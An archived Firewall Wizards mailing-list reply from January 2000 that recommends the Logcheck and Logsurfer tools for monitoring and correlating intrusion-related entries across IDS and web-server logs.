Firewall Wizards mailing list archives
Re: Tools to correlate attacks b/w diff. logs
From: Rafi Sadowsky <rafi () meron openu ac il>
Date: Fri, 14 Jan 2000 10:12:49 +0200 (IST)
Logcheck will tail mmultiple logfiles with som pattern matching <ftp://ftp.cert.dfn.de/pub/tools/audit/logcheck/logcheck-1.01.tar.gz> Logsurfer - will only do one file at a time but with multiple contexts ( a context can be opened on a regexp match & continue collecting lines until a timeout , or report line X only if line Y doesn't get logged within a timeout) <http://www.cert.dfn.de/eng/logsurf/> -- Rafi Sadowsky rafi () oumail openu ac il Network/System/Security VoiceMail: +972-3-646-0592 FAX: +972-3-646-5410 Mangler ( :-) | member ILAN-CERT(CERT () CERT AC IL) Open University of Israel | (PGP key -> ) http://telem.openu.ac.il/~rafi On Tue, 11 Jan 2000, Pete Storm wrote:
Hi all, Does anyone know of a tool out there that will allow me to correlate incidents between several different logs? For example, if I see an attempt to pull off a php exploit on my IDS it stands to reason that I'll see a similar log entry on my web server. What I'm looking for is something that will pull these two records out of the individual logs and place them in an "incident" log as a related event. The current problem is that we're talking about hundreds of thousands of log entries. Suppose I could Perl it, but I was kinda hoping there might be a commercial/shareware tool out there already that could do it so much better than I could. thanks, phs __________________________________________________ Do You Yahoo!? Talk to your friends online with Yahoo! Messenger. http://im.yahoo.com
Current thread:
- Tools to correlate attacks b/w diff. logs Pete Storm (Jan 12)
- Re: Tools to correlate attacks b/w diff. logs R. DuFresne (Jan 13)
- Re: Tools to correlate attacks b/w diff. logs Bryan Swann (Jan 16)
- Re: Tools to correlate attacks b/w diff. logs R. DuFresne (Jan 16)
- Re: Tools to correlate attacks b/w diff. logs Bryan Swann (Jan 16)
- RE: Tools to correlate attacks b/w diff. logs Shaun Moran (Jan 13)
- Re: Tools to correlate attacks b/w diff. logs Rafi Sadowsky (Jan 15)
- <Possible follow-ups>
- RE: Tools to correlate attacks b/w diff. logs Desai, Ashish (Jan 15)
- Re: Tools to correlate attacks b/w diff. logs R. DuFresne (Jan 13)